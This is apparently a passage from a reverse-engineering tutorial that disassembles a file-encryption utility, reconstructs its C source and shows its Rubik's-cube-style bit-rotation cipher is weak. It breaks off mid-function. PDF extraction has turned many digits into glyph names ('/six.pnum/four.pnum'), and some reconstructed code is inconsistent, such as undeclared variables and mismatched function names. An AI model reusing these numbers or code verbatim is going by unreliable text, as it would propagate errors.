.text:00541320 crypt_file proc near
.text:00541320
.text:00541320 Str = dword ptr 4
.text:00541320 Filename = dword ptr 8
.text:00541320 password = dword ptr 0Ch
.text:00541320
Open file and report error in case of error:
.text:00541320 mov eax, [esp+Str]
.text:00541324 push ebp
.text:00541325 push offset Mode ; "rb"
.text:0054132A push eax ; Filename
.text:0054132B call _fopen ; open file
.text:00541330 mov ebp, eax
.text:00541332 add esp, 8
.text:00541335 test ebp, ebp
.text:00541337 jnz short loc_541348
.text:00541339 push offset Format ; "Cannot open input file!\n"
.text:0054133E call _printf
.text:00541343 add esp, 4
.text:00541346 pop ebp
/two.pnum/zero.pnum/three.pnum
.text:00541347 retn
.text:00541348 ; ---------------------------------------------------------------------------
.text:00541348
.text:00541348 loc_541348:
Get file size via fseek() /ftell() :
.text:00541348 push ebx
.text:00541349 push esi
.text:0054134A push edi
.text:0054134B push 2 ; Origin
.text:0054134D push 0 ; Offset
.text:0054134F push ebp ; File
; move current file position to the end
.text:00541350 call _fseek
.text:00541355 push ebp ; File
.text:00541356 call _ftell ; get current file position
.text:0054135B push 0 ; Origin
.text:0054135D push 0 ; Offset
.text:0054135F push ebp ; File
.text:00541360 mov [esp+2Ch+Str], eax
; move current file position to the start
.text:00541364 call _fseek
This fragment of code calculates file size aligned to /six.pnum/four.pnum-byte border. This is because this cryptoalgorithm works
with only /six.pnum/four.pnum-byte blocks. Its operation is pretty simple: divide file size by /six.pnum/four.pnum, forget about remainder and add /one.pnum,
then multiple by /six.pnum/four.pnum. The following code removes remainder as if value was already divided by /six.pnum/four.pnum and adds /six.pnum/four.pnum. It
is almost the same.
.text:00541369 mov esi, [esp+2Ch+Str]
.text:0054136D and esi, 0FFFFFFC0h ; reset all lowest 6 bits
.text:00541370 add esi, 40h ; align size to 64-byte border
Allocate buffer with aligned size:
.text:00541373 push esi ; Size
.text:00541374 call _malloc
Call memset(), e,g, clear allocated buffer/two.pnum.
.text:00541379 mov ecx, esi
.text:0054137B mov ebx, eax ; allocated buffer pointer -> to EBX
.text:0054137D mov edx, ecx
.text:0054137F xor eax, eax
.text:00541381 mov edi, ebx
.text:00541383 push ebp ; File
.text:00541384 shr ecx, 2
.text:00541387 rep stosd
.text:00541389 mov ecx, edx
.text:0054138B push 1 ; Count
.text:0054138D and ecx, 3
.text:00541390 rep stosb ; memset (buffer, 0, aligned_size)
Read file via standard C function fread() .
.text:00541392 mov eax, [esp+38h+Str]
.text:00541396 push eax ; ElementSize
.text:00541397 push ebx ; DstBuf
.text:00541398 call _fread ; read file
.text:0054139D push ebp ; File
.text:0054139E call _fclose
Callcrypt() . This function takes buffer, buffer size (aligned) and password string.
/two.pnummalloc() + memset() could be replaced by calloc()
/two.pnum/zero.pnum/four.pnum
.text:005413A3 mov ecx, [esp+44h+password]
.text:005413A7 push ecx ; password
.text:005413A8 push esi ; aligned size
.text:005413A9 push ebx ; buffer
.text:005413AA call crypt ; do crypt
Create output file. By the way, developer forgot to check if it is was created correctly! File opening result is
being checked though.
.text:005413AF mov edx, [esp+50h+Filename]
.text:005413B3 add esp, 40h
.text:005413B6 push offset aWb ; "wb"
.text:005413BB push edx ; Filename
.text:005413BC call _fopen
.text:005413C1 mov edi, eax
Newly created file handle is in EDIregister now. Write signature “QR/nine.pnum” .
.text:005413C3 push edi ; File
.text:005413C4 push 1 ; Count
.text:005413C6 push 3 ; Size
.text:005413C8 push offset aQr9 ; "QR9"
.text:005413CD call _fwrite ; write file signature
Write actual file size (not aligned):
.text:005413D2 push edi ; File
.text:005413D3 push 1 ; Count
.text:005413D5 lea eax, [esp+30h+Str]
.text:005413D9 push 4 ; Size
.text:005413DB push eax ; Str
.text:005413DC call _fwrite ; write original file size
Write crypted buffer:
.text:005413E1 push edi ; File
.text:005413E2 push 1 ; Count
.text:005413E4 push esi ; Size
.text:005413E5 push ebx ; Str
.text:005413E6 call _fwrite ; write crypted file
Close file and free allocated buffer:
.text:005413EB push edi ; File
.text:005413EC call _fclose
.text:005413F1 push ebx ; Memory
.text:005413F2 call _free
.text:005413F7 add esp, 40h
.text:005413FA pop edi
.text:005413FB pop esi
.text:005413FC pop ebx
.text:005413FD pop ebp
.text:005413FE retn
.text:005413FE crypt_file endp
Here is reconstructed C-code:
void crypt_file(char *fin, char* fout, char *pw)
{
FILE *f;
int flen, flen_aligned;
BYTE *buf;
f=fopen(fin, "rb");
if (f==NULL)
{
/two.pnum/zero.pnum/five.pnum
printf ("Cannot open input file!\n");
return;
};
fseek (f, 0, SEEK_END);
flen=ftell (f);
fseek (f, 0, SEEK_SET);
flen_aligned=(flen&0xFFFFFFC0)+0x40;
buf=(BYTE*)malloc (flen_aligned);
memset (buf, 0, flen_aligned);
fread (buf, flen, 1, f);
fclose (f);
crypt (buf, flen_aligned, pw);
f=fopen(fout, "wb");
fwrite ("QR9", 3, 1, f);
fwrite (&flen, 4, 1, f);
fwrite (buf, flen_aligned, 1, f);
fclose (f);
free (buf);
};
Decrypting procedure is almost the same:
.text:00541400 ; int __cdecl decrypt_file(char *Filename, int, void *Src)
.text:00541400 decrypt_file proc near
.text:00541400
.text:00541400 Filename = dword ptr 4
.text:00541400 arg_4 = dword ptr 8
.text:00541400 Src = dword ptr 0Ch
.text:00541400
.text:00541400 mov eax, [esp+Filename]
.text:00541404 push ebx
.text:00541405 push ebp
.text:00541406 push esi
.text:00541407 push edi
.text:00541408 push offset aRb ; "rb"
.text:0054140D push eax ; Filename
.text:0054140E call _fopen
.text:00541413 mov esi, eax
.text:00541415 add esp, 8
.text:00541418 test esi, esi
.text:0054141A jnz short loc_54142E
.text:0054141C push offset aCannotOpenIn_0 ; "Cannot open input file!\n"
.text:00541421 call _printf
.text:00541426 add esp, 4
.text:00541429 pop edi
.text:0054142A pop esi
.text:0054142B pop ebp
.text:0054142C pop ebx
.text:0054142D retn
.text:0054142E ; ---------------------------------------------------------------------------
.text:0054142E
.text:0054142E loc_54142E:
.text:0054142E push 2 ; Origin
.text:00541430 push 0 ; Offset
.text:00541432 push esi ; File
.text:00541433 call _fseek
.text:00541438 push esi ; File
/two.pnum/zero.pnum/six.pnum
.text:00541439 call _ftell
.text:0054143E push 0 ; Origin
.text:00541440 push 0 ; Offset
.text:00541442 push esi ; File
.text:00541443 mov ebp, eax
.text:00541445 call _fseek
.text:0054144A push ebp ; Size
.text:0054144B call _malloc
.text:00541450 push esi ; File
.text:00541451 mov ebx, eax
.text:00541453 push 1 ; Count
.text:00541455 push ebp ; ElementSize
.text:00541456 push ebx ; DstBuf
.text:00541457 call _fread
.text:0054145C push esi ; File
.text:0054145D call _fclose
Check signature (first /three.pnum bytes):
.text:00541462 add esp, 34h
.text:00541465 mov ecx, 3
.text:0054146A mov edi, offset aQr9_0 ; "QR9"
.text:0054146F mov esi, ebx
.text:00541471 xor edx, edx
.text:00541473 repe cmpsb
.text:00541475 jz short loc_541489
Report an error if signature is absent:
.text:00541477 push offset aFileIsNotCrypt ; "File is not crypted!\n"
.text:0054147C call _printf
.text:00541481 add esp, 4
.text:00541484 pop edi
.text:00541485 pop esi
.text:00541486 pop ebp
.text:00541487 pop ebx
.text:00541488 retn
.text:00541489 ; ---------------------------------------------------------------------------
.text:00541489
.text:00541489 loc_541489:
Calldecrypt() .
.text:00541489 mov eax, [esp+10h+Src]
.text:0054148D mov edi, [ebx+3]
.text:00541490 add ebp, 0FFFFFFF9h
.text:00541493 lea esi, [ebx+7]
.text:00541496 push eax ; Src
.text:00541497 push ebp ; int
.text:00541498 push esi ; int
.text:00541499 call decrypt
.text:0054149E mov ecx, [esp+1Ch+arg_4]
.text:005414A2 push offset aWb_0 ; "wb"
.text:005414A7 push ecx ; Filename
.text:005414A8 call _fopen
.text:005414AD mov ebp, eax
.text:005414AF push ebp ; File
.text:005414B0 push 1 ; Count
.text:005414B2 push edi ; Size
.text:005414B3 push esi ; Str
.text:005414B4 call _fwrite
.text:005414B9 push ebp ; File
.text:005414BA call _fclose
.text:005414BF push ebx ; Memory
.text:005414C0 call _free
.text:005414C5 add esp, 2Ch
.text:005414C8 pop edi
/two.pnum/zero.pnum/seven.pnum
.text:005414C9 pop esi
.text:005414CA pop ebp
.text:005414CB pop ebx
.text:005414CC retn
.text:005414CC decrypt_file endp
Here is reconstructed C-code:
void decrypt_file(char *fin, char* fout, char *pw)
{
FILE *f;
int real_flen, flen;
BYTE *buf;
f=fopen(fin, "rb");
if (f==NULL)
{
printf ("Cannot open input file!\n");
return;
};
fseek (f, 0, SEEK_END);
flen=ftell (f);
fseek (f, 0, SEEK_SET);
buf=(BYTE*)malloc (flen);
fread (buf, flen, 1, f);
fclose (f);
if (memcmp (buf, "QR9", 3)!=0)
{
printf ("File is not crypted!\n");
return;
};
memcpy (&real_flen, buf+3, 4);
decrypt (buf+(3+4), flen-(3+4), pw);
f=fopen(fout, "wb");
fwrite (buf+(3+4), real_flen, 1, f);
fclose (f);
free (buf);
};
OK, now let’s go deeper.
Function crypt() :
.text:00541260 crypt proc near
.text:00541260
.text:00541260 arg_0 = dword ptr 4
.text:00541260 arg_4 = dword ptr 8
.text:00541260 arg_8 = dword ptr 0Ch
.text:00541260
.text:00541260 push ebx
.text:00541261 mov ebx, [esp+4+arg_0]
.text:00541265 push ebp
.text:00541266 push esi
.text:00541267 push edi
.text:00541268 xor ebp, ebp
.text:0054126A
/two.pnum/zero.pnum/eight.pnum
.text:0054126A loc_54126A:
This fragment of code copies part of input buffer to internal array I named later “cube/six.pnum/four.pnum” . The size is in ECX
register.MOVSD means move /three.pnum/two.pnum-bit dword , so, /one.pnum/six.pnum of /three.pnum/two.pnum-bit dwords are exactly /six.pnum/four.pnum bytes.
.text:0054126A mov eax, [esp+10h+arg_8]
.text:0054126E mov ecx, 10h
.text:00541273 mov esi, ebx ; EBX is pointer within input buffer
.text:00541275 mov edi, offset cube64
.text:0054127A push 1
.text:0054127C push eax
.text:0054127D rep movsd
Callrotate_all_with_password() :
.text:0054127F call rotate_all_with_password
Copy crypted contents back from “cube/six.pnum/four.pnum” to buffer:
.text:00541284 mov eax, [esp+18h+arg_4]
.text:00541288 mov edi, ebx
.text:0054128A add ebp, 40h
.text:0054128D add esp, 8
.text:00541290 mov ecx, 10h
.text:00541295 mov esi, offset cube64
.text:0054129A add ebx, 40h ; add 64 to input buffer pointer
.text:0054129D cmp ebp, eax ; EBP contain ammount of crypted data.
.text:0054129F rep movsd
IfEBPis not bigger that input argument size, then continue to next block.
.text:005412A1 jl short loc_54126A
.text:005412A3 pop edi
.text:005412A4 pop esi
.text:005412A5 pop ebp
.text:005412A6 pop ebx
.text:005412A7 retn
.text:005412A7 crypt endp
Reconstructed crypt() function:
void crypt (BYTE *buf, int sz, char *pw)
{
int i=0;
do
{
memcpy (cube, buf+i, 8*8);
rotate_all (pw, 1);
memcpy (buf+i, cube, 8*8);
i+=64;
}
while (i<sz);
};
OK, now let’s go deeper into function rotate_all_with_password() . It takes two arguments: password
string and number. In crypt() , number /one.pnum is used, and in decrypt() (whererotate_all_with_password() func-
tion is called too), number is /three.pnum.
.text:005411B0 rotate_all_with_password proc near
.text:005411B0
.text:005411B0 arg_0 = dword ptr 4
.text:005411B0 arg_4 = dword ptr 8
.text:005411B0
.text:005411B0 mov eax, [esp+arg_0]
.text:005411B4 push ebp
.text:005411B5 mov ebp, eax
/two.pnum/zero.pnum/nine.pnum
Check for character in password. If it is zero, exit:
.text:005411B7 cmp byte ptr [eax], 0
.text:005411BA jz exit
.text:005411C0 push ebx
.text:005411C1 mov ebx, [esp+8+arg_4]
.text:005411C5 push esi
.text:005411C6 push edi
.text:005411C7
.text:005411C7 loop_begin:
Calltolower() , standard C function.
.text:005411C7 movsx eax, byte ptr [ebp+0]
.text:005411CB push eax ; C
.text:005411CC call _tolower
.text:005411D1 add esp, 4
Hmm, if password contains non-alphabetical latin character, it is skipped! Indeed, if we run crypting utility
and try non-alphabetical latin characters in password, they seem to be ignored.
.text:005411D4 cmp al, ’a’
.text:005411D6 jl short next_character_in_password
.text:005411D8 cmp al, ’z’
.text:005411DA jg short next_character_in_password
.text:005411DC movsx ecx, al
Subtract “a” value (/nine.pnum/seven.pnum) from character.
.text:005411DF sub ecx, ’a’ ; 97
A/f_ter subtracting, we’ll get /zero.pnum for “a” here, /one.pnum for “b” , etc. And /two.pnum/five.pnum for “z” .
.text:005411E2 cmp ecx, 24
.text:005411E5 jle short skip_subtracting
.text:005411E7 sub ecx, 24
It seems, “y” and “z” are exceptional characters too. A/f_ter that fragment of code, “y” becomes /zero.pnum and “z” — /one.pnum.
This means, /two.pnum/six.pnum latin alphabet symbols will become values in range /zero.pnum../two.pnum/three.pnum, (/two.pnum/four.pnum in total).
.text:005411EA
.text:005411EA skip_subtracting: ; CODE XREF: rotate_all_with_password+35
This is actually division via multiplication. Read more about it in “Division by /nine.pnum” section /one.pnum./one.pnum/two.pnum.
The code actually divides password character value by /three.pnum.
.text:005411EA mov eax, 55555556h
.text:005411EF imul ecx
.text:005411F1 mov eax, edx
.text:005411F3 shr eax, 1Fh
.text:005411F6 add edx, eax
.text:005411F8 mov eax, ecx
.text:005411FA mov esi, edx
.text:005411FC mov ecx, 3
.text:00541201 cdq
.text:00541202 idiv ecx
EDXis the remainder of division.
.text:00541204 sub edx, 0
.text:00541207 jz short call_rotate1 ; if remainder is zero, go to rotate1
.text:00541209 dec edx
.text:0054120A jz short call_rotate2 ; .. it it is 1, go to rotate2
.text:0054120C dec edx
.text:0054120D jnz short next_character_in_password
.text:0054120F test ebx, ebx
.text:00541211 jle short next_character_in_password
.text:00541213 mov edi, ebx
/two.pnum/one.pnum/zero.pnum
If remainder is /two.pnum, call rotate3() .EDIis a second argument of rotate_all_with_password() . As I already
wrote, /one.pnum is for crypting operations and /three.pnum is for decrypting. So, here is a loop. When crypting, rotate/one.pnum//two.pnum//three.pnum will be
called the same number of times as given in the first argument.
.text:00541215 call_rotate3:
.text:00541215 push esi
.text:00541216 call rotate3
.text:0054121B add esp, 4
.text:0054121E dec edi
.text:0054121F jnz short call_rotate3
.text:00541221 jmp short next_character_in_password
.text:00541223
.text:00541223 call_rotate2:
.text:00541223 test ebx, ebx
.text:00541225 jle short next_character_in_password
.text:00541227 mov edi, ebx
.text:00541229
.text:00541229 loc_541229:
.text:00541229 push esi
.text:0054122A call rotate2
.text:0054122F add esp, 4
.text:00541232 dec edi
.text:00541233 jnz short loc_541229
.text:00541235 jmp short next_character_in_password
.text:00541237
.text:00541237 call_rotate1:
.text:00541237 test ebx, ebx
.text:00541239 jle short next_character_in_password
.text:0054123B mov edi, ebx
.text:0054123D
.text:0054123D loc_54123D:
.text:0054123D push esi
.text:0054123E call rotate1
.text:00541243 add esp, 4
.text:00541246 dec edi
.text:00541247 jnz short loc_54123D
.text:00541249
Fetch next character from password string.
.text:00541249 next_character_in_password:
.text:00541249 mov al, [ebp+1]
Increment character pointer within password string:
.text:0054124C inc ebp
.text:0054124D test al, al
.text:0054124F jnz loop_begin
.text:00541255 pop edi
.text:00541256 pop esi
.text:00541257 pop ebx
.text:00541258
.text:00541258 exit:
.text:00541258 pop ebp
.text:00541259 retn
.text:00541259 rotate_all_with_password endp
Here is reconstructed C code:
void rotate_all (char *pwd, int v)
{
char *p=pwd;
while (*p)
{
char c=*p;
int q;
/two.pnum/one.pnum/one.pnum
c=tolower (c);
if (c>=’a’ && c<=’z’)
{
q=c-’a’;
if (q>24)
q-=24;
int quotient=q/3;
int remainder=q % 3;
switch (remainder)
{
case 0: for (int i=0; i<v; i++) rotate1 (quotient); break;
case 1: for (int i=0; i<v; i++) rotate2 (quotient); break;
case 2: for (int i=0; i<v; i++) rotate3 (quotient); break;
};
};
p++;
};
};
Now let’s go deeper and investigate rotate/one.pnum//two.pnum//three.pnum functions. Each function calls two another functions. I even-
tually gave them names set_bit() andget_bit() .
Let’s start with get_bit() :
.text:00541050 get_bit proc near
.text:00541050
.text:00541050 arg_0 = dword ptr 4
.text:00541050 arg_4 = dword ptr 8
.text:00541050 arg_8 = byte ptr 0Ch
.text:00541050
.text:00541050 mov eax, [esp+arg_4]
.text:00541054 mov ecx, [esp+arg_0]
.text:00541058 mov al, cube64[eax+ecx*8]
.text:0054105F mov cl, [esp+arg_8]
.text:00541063 shr al, cl
.text:00541065 and al, 1
.text:00541067 retn
.text:00541067 get_bit endp
...in other words: calculate an index in the array cube/six.pnum/four.pnum: arg_/four.pnum + arg_/zero.pnum * /eight.pnum . Then shi/f_t a byte from an array by
arg_/eight.pnum bits right. Isolate lowest bit and return it.
Let’s see another function, set_bit() :
.text:00541000 set_bit proc near
.text:00541000
.text:00541000 arg_0 = dword ptr 4
.text:00541000 arg_4 = dword ptr 8
.text:00541000 arg_8 = dword ptr 0Ch
.text:00541000 arg_C = byte ptr 10h
.text:00541000
.text:00541000 mov al, [esp+arg_C]
.text:00541004 mov ecx, [esp+arg_8]
.text:00541008 push esi
.text:00541009 mov esi, [esp+4+arg_0]
.text:0054100D test al, al
.text:0054100F mov eax, [esp+4+arg_4]
.text:00541013 mov dl, 1
.text:00541015 jz short loc_54102B
DL is /one.pnum here. Shi/f_t le/f_t it by arg_/eight.pnum. For example, if arg_/eight.pnum is /four.pnum, DL register value became /zero.pnumx/one.pnum/zero.pnum or /one.pnum/zero.pnum/zero.pnum/zero.pnum in binary
form.
/two.pnum/one.pnum/two.pnum
.text:00541017 shl dl, cl
.text:00541019 mov cl, cube64[eax+esi*8]
Get bit from array and explicitly set one.
.text:00541020 or cl, dl
Store it back:
.text:00541022 mov cube64[eax+esi*8], cl
.text:00541029 pop esi
.text:0054102A retn
.text:0054102B ; ---------------------------------------------------------------------------
.text:0054102B
.text:0054102B loc_54102B:
.text:0054102B shl dl, cl
If arg_C is not zero...
.text:0054102D mov cl, cube64[eax+esi*8]
...invert DL. For example, if DL state a/f_ter shi/f_t was /zero.pnumx/one.pnum/zero.pnum or /one.pnum/zero.pnum/zero.pnum/zero.pnum in binary form, there will be /zero.pnumxEF a/f_ter NOT
instruction or /one.pnum/one.pnum/one.pnum/zero.pnum/one.pnum/one.pnum/one.pnum/one.pnum in binary form.
.text:00541034 not dl
This instruction clears bit, in other words, it saves all bits in CL which are also set in DL except those in DL
which are cleared. This means that if DL is, for example, 11101111 in binary form, all bits will be saved except /five.pnumth
(counting from lowest bit).
.text:00541036 and cl, dl
Store it back:
.text:00541038 mov cube64[eax+esi*8], cl
.text:0054103F pop esi
.text:00541040 retn
.text:00541040 set_bit endp
It is almost the same as get_bit() , except, if arg_C is zero, the function clears specific bit in array, or sets it
otherwise.
We also know that array size is /six.pnum/four.pnum. First two arguments both in set_bit() andget_bit() could be seen as
/two.pnumD cooridnates. Then array will be /eight.pnum*/eight.pnum matrix.
Here is C representation of what we already know:
#define IS_SET(flag, bit) ((flag) & (bit))
#define SET_BIT(var, bit) ((var) |= (bit))
#define REMOVE_BIT(var, bit) ((var) &= ~(bit))
char cube[8][8];
void set_bit (int x, int y, int shift, int bit)
{
if (bit)
SET_BIT (cube[x][y], 1<<shift);
else
REMOVE_BIT (cube[x][y], 1<<shift);
};
int get_bit (int x, int y, int shift)
{
if ((cube[x][y]>>shift)&1==1)
return 1;
return 0;
};
/two.pnum/one.pnum/three.pnum
Now let’s get back to rotate/one.pnum//two.pnum//three.pnum functions.
.text:00541070 rotate1 proc near
.text:00541070
Internal array allocation in local stack, its size /six.pnum/four.pnum bytes:
.text:00541070 internal_array_64= byte ptr -40h
.text:00541070 arg_0 = dword ptr 4
.text:00541070
.text:00541070 sub esp, 40h
.text:00541073 push ebx
.text:00541074 push ebp
.text:00541075 mov ebp, [esp+48h+arg_0]
.text:00541079 push esi
.text:0054107A push edi
.text:0054107B xor edi, edi ; EDI is loop1 counter
EBXis a pointer to internal array:
.text:0054107D lea ebx, [esp+50h+internal_array_64]
.text:00541081
Two nested loops are here:
.text:00541081 first_loop1_begin:
.text:00541081 xor esi, esi ; ESI is loop 2 counter
.text:00541083
.text:00541083 first_loop2_begin:
.text:00541083 push ebp ; arg_0
.text:00541084 push esi ; loop 1 counter
.text:00541085 push edi ; loop 2 counter
.text:00541086 call get_bit
.text:0054108B add esp, 0Ch
.text:0054108E mov [ebx+esi], al ; store to internal array
.text:00541091 inc esi ; increment loop 1 counter
.text:00541092 cmp esi, 8
.text:00541095 jl short first_loop2_begin
.text:00541097 inc edi ; increment loop 2 counter
.text:00541098 add ebx, 8 ; increment internal array pointer by 8 at each loop 1 iteration
.text:0054109B cmp edi, 8
.text:0054109E jl short first_loop1_begin
...we see that both loop counters are in range /zero.pnum../seven.pnum. Also, they are used as first and second arguments of
get_bit() . Third argument of get_bit() is the only argument of rotate1() . Whatget_bit() returns, is be-
ing placed into internal array.
Prepare pointer to internal array again:
.text:005410A0 lea ebx, [esp+50h+internal_array_64]
.text:005410A4 mov edi, 7 ; EDI is loop 1 counter, initial state is 7
.text:005410A9
.text:005410A9 second_loop1_begin:
.text:005410A9 xor esi, esi ; ESI is loop 2 counter
.text:005410AB
.text:005410AB second_loop2_begin:
.text:005410AB mov al, [ebx+esi] ; value from internal array
.text:005410AE push eax
.text:005410AF push ebp ; arg_0
.text:005410B0 push edi ; loop 1 counter
.text:005410B1 push esi ; loop 2 counter
.text:005410B2 call set_bit
.text:005410B7 add esp, 10h
.text:005410BA inc esi ; increment loop 2 counter
.text:005410BB cmp esi, 8
.text:005410BE jl short second_loop2_begin
.text:005410C0 dec edi ; decrement loop 2 counter
.text:005410C1 add ebx, 8 ; increment pointer in internal array
/two.pnum/one.pnum/four.pnum
.text:005410C4 cmp edi, 0FFFFFFFFh
.text:005410C7 jg short second_loop1_begin
.text:005410C9 pop edi
.text:005410CA pop esi
.text:005410CB pop ebp
.text:005410CC pop ebx
.text:005410CD add esp, 40h
.text:005410D0 retn
.text:005410D0 rotate1 endp
...this code is placing contents from internal array to cube global array via set_bit() function, but, in different
order! Now loop /one.pnum counter is in range /seven.pnum to /zero.pnum, decrementing at each iteration!
C code representation looks like:
void rotate1 (int v)
{
bool tmp[8][8]; // internal array
int i, j;
for (i=0; i<8; i++)
for (j=0; j<8; j++)
tmp[i][j]=get_bit (i, j, v);
for (i=0; i<8; i++)
for (j=0; j<8; j++)
set_bit (j, 7-i, v, tmp[x][y]);
};
Not very understandable, but if we will take a look at rotate2() function:
.text:005410E0 rotate2 proc near
.text:005410E0
.text:005410E0 internal_array_64 = byte ptr -40h
.text:005410E0 arg_0 = dword ptr 4
.text:005410E0
.text:005410E0 sub esp, 40h
.text:005410E3 push ebx
.text:005410E4 push ebp
.text:005410E5 mov ebp, [esp+48h+arg_0]
.text:005410E9 push esi
.text:005410EA push edi
.text:005410EB xor edi, edi ; loop 1 counter
.text:005410ED lea ebx, [esp+50h+internal_array_64]
.text:005410F1
.text:005410F1 loc_5410F1:
.text:005410F1 xor esi, esi ; loop 2 counter
.text:005410F3
.text:005410F3 loc_5410F3:
.text:005410F3 push esi ; loop 2 counter
.text:005410F4 push edi ; loop 1 counter
.text:005410F5 push ebp ; arg_0
.text:005410F6 call get_bit
.text:005410FB add esp, 0Ch
.text:005410FE mov [ebx+esi], al ; store to internal array
.text:00541101 inc esi ; increment loop 1 counter
.text:00541102 cmp esi, 8
.text:00541105 jl short loc_5410F3
.text:00541107 inc edi ; increment loop 2 counter
.text:00541108 add ebx, 8
.text:0054110B cmp edi, 8
.text:0054110E jl short loc_5410F1
.text:00541110 lea ebx, [esp+50h+internal_array_64]
.text:00541114 mov edi, 7 ; loop 1 counter is initial state 7
.text:00541119
.text:00541119 loc_541119:
.text:00541119 xor esi, esi ; loop 2 counter
.text:0054111B
/two.pnum/one.pnum/five.pnum
.text:0054111B loc_54111B:
.text:0054111B mov al, [ebx+esi] ; get byte from internal array
.text:0054111E push eax
.text:0054111F push edi ; loop 1 counter
.text:00541120 push esi ; loop 2 counter
.text:00541121 push ebp ; arg_0
.text:00541122 call set_bit
.text:00541127 add esp, 10h
.text:0054112A inc esi ; increment loop 2 counter
.text:0054112B cmp esi, 8
.text:0054112E jl short loc_54111B
.text:00541130 dec edi ; decrement loop 2 counter
.text:00541131 add ebx, 8
.text:00541134 cmp edi, 0FFFFFFFFh
.text:00541137 jg short loc_541119
.text:00541139 pop edi
.text:0054113A pop esi
.text:0054113B pop ebp
.text:0054113C pop ebx
.text:0054113D add esp, 40h
.text:00541140 retn
.text:00541140 rotate2 endp
It isalmost the same, except of different order of arguments of get_bit() andset_bit() . Let’s rewrite it in
C-like code:
void rotate2 (int v)
{
bool tmp[8][8]; // internal array
int i, j;
for (i=0; i<8; i++)
for (j=0; j<8; j++)
tmp[i][j]=get_bit (v, i, j);
for (i=0; i<8; i++)
for (j=0; j<8; j++)
set_bit (v, j, 7-i, tmp[i][j]);
};
Let’s also rewrite rotate3() function:
void rotate3 (int v)
{
bool tmp[8][8];
int i, j;
for (i=0; i<8; i++)
for (j=0; j<8; j++)
tmp[i][j]=get_bit (i, v, j);
for (i=0; i<8; i++)
for (j=0; j<8; j++)
set_bit (7-j, v, i, tmp[i][j]);
};
Well, now things are simpler. If we consider cube/six.pnum/four.pnum as /three.pnumD cube /eight.pnum*/eight.pnum*/eight.pnum, where each element is bit, get_bit()
andset_bit() take just coordinates of bit on input.
rotate/one.pnum//two.pnum//three.pnum functions are in fact rotating all bits in specific plane. Three functions are each for each cube side
and v argument is setting plane in range /zero.pnum../seven.pnum.
Maybe, algorithm’s author was thinking of /eight.pnum*/eight.pnum*/eight.pnum Rubik’s cube?!
Yes, indeed.
Let’s get closer into decrypt() function, I rewrote it here:
void decrypt (BYTE *buf, int sz, char *pw)
{
/two.pnum/one.pnum/six.pnum
char *p=strdup (pw);
strrev (p);
int i=0;
do
{
memcpy (cube, buf+i, 8*8);
rotate_all (p, 3);
memcpy (buf+i, cube, 8*8);
i+=64;
}
while (i<sz);
free (p);
};
It is almost the same excert of crypt() ,butpassword string is reversed by strrev() standard C function and
rotate_all() is called with argument /three.pnum.
This means, that in case of decryption, each corresponding rotate/one.pnum//two.pnum//three.pnum call will be performed thrice.
This is almost as in Rubik’c cube! If you want to get back, do the same in reverse order and direction! If you
need to undo effect of rotating one place in clockwise direction, rotate it thrice in counter-clockwise direction.
rotate1() is apparently for rotating “front” plane. rotate2() is apparently for rotating “top” plane. rotate3()
is apparently for rotating “le/f_t” plane.
Let’s get back to core of rotate_all() function:
q=c-’a’;
if (q>24)
q-=24;
int quotient=q/3; // in range 0..7
int remainder=q % 3;
switch (remainder)
{
case 0: for (int i=0; i<v; i++) rotate1 (quotient); break; // front
case 1: for (int i=0; i<v; i++) rotate2 (quotient); break; // top
case 2: for (int i=0; i<v; i++) rotate3 (quotient); break; // left
};
Now it is much simpler to understand: each password character defines side (one of three) and plane (one of
/eight.pnum). /three.pnum*/eight.pnum = /two.pnum/four.pnum, that’s why two last characters of latin alphabet are remapped to fit an alphabet of exactly /two.pnum/four.pnum elements.
The algorithm is clearly weak: in case of short passwords, one can see, that in crypted file there are some
original bytes of original file in binary files editor.
Here is reconstructed whole source code:
#include <windows.h>
#include <stdio.h>
#include <assert.h>
#define IS_SET(flag, bit) ((flag) & (bit))
#define SET_BIT(var, bit) ((var) |= (bit))
#define REMOVE_BIT(var, bit) ((var) &= ~(bit))
static BYTE cube[8][8];
void set_bit (int x, int y, int z, bool bit)
{
if (bit)
SET_BIT (cube[x][y], 1<<z);
else
REMOVE_BIT (cube[x][y], 1<<z);
};
/two.pnum/one.pnum/seven.pnum
bool get_bit (int x, int y, int z)
{
if ((cube[x][y]>>z)&1==1)
return true;
return false;
};
void rotate_f (int row)
{
bool tmp[8][8];
int x, y;
for (x=0; x<8; x++)
for (y=0; y<8; y++)
tmp[x][y]=get_bit (x, y, row);
for (x=0; x<8; x++)
for (y=0; y<8; y++)
set_bit (y, 7-x, row, tmp[x][y]);
};
void rotate_t (int row)
{
bool tmp[8][8];
int y, z;
for (y=0; y<8; y++)
for (z=0; z<8; z++)
tmp[y][z]=get_bit (row, y, z);
for (y=0; y<8; y++)
for (z=0; z<8; z++)
set_bit (row, z, 7-y, tmp[y][z]);
};
void rotate_l (int row)
{
bool tmp[8][8];
int x, z;
for (x=0; x<8; x++)
for (z=0; z<8; z++)
tmp[x][z]=get_bit (x, row, z);
for (x=0; x<8; x++)
for (z=0; z<8; z++)
set_bit (7-z, row, x, tmp[x][z]);
};
void rotate_all (char *pwd, int v)
{
char *p=pwd;
while (*p)
{
char c=*p;
int q;
c=tolower (c);
if (c>=’a’ && c<=’z’)
{
q=c-’a’;
if (q>24)
q-=24;
/two.pnum/one.pnum/eight.pnum
int quotient=q/3;
int remainder=q % 3;
switch (remainder)
{
case 0: for (int i=0; i<v; i++) rotate1 (quotient); break;
case 1: for (int i=0; i<v; i++) rotate2 (quotient); break;
case 2: for (int i=0; i<v; i++) rotate3 (quotient); break;
};
};
p++;
};
};
void crypt (BYTE *buf, int sz, char *pw)
{
int i=0;
do
{
memcpy (cube, buf+i, 8*8);
rotate_all (pw, 1);
memcpy (buf+i, cube, 8*8);
i+=64;
}
while (i<sz);
};
void decrypt (BYTE *buf, int sz, char *pw)
{
char *p=strdup (pw);
strrev (p);
int i=0;
do
{
memcpy (cube, buf+i, 8*8);
rotate_all (p, 3);
memcpy (buf+i, cube, 8*8);
i+=64;
}
while (i<sz);
free (p);
};
void crypt_file(char *fin, char* fout, char *pw)
{
FILE *f;
int flen, flen_aligned;
BYTE *buf;
f=fopen(fin, "rb");
if (f==NULL)
{
printf ("Cannot open input file!\n");
return;
};
fseek (f, 0, SEEK_END);
flen=ftell (f);
fseek (f, 0, SEEK_SET);
flen_aligned=(flen&0xFFFFFFC0)+0x40;
/two.pnum/one.pnum/nine.pnum
buf=(BYTE*)malloc (flen_aligned);
memset (buf, 0, flen_aligned);
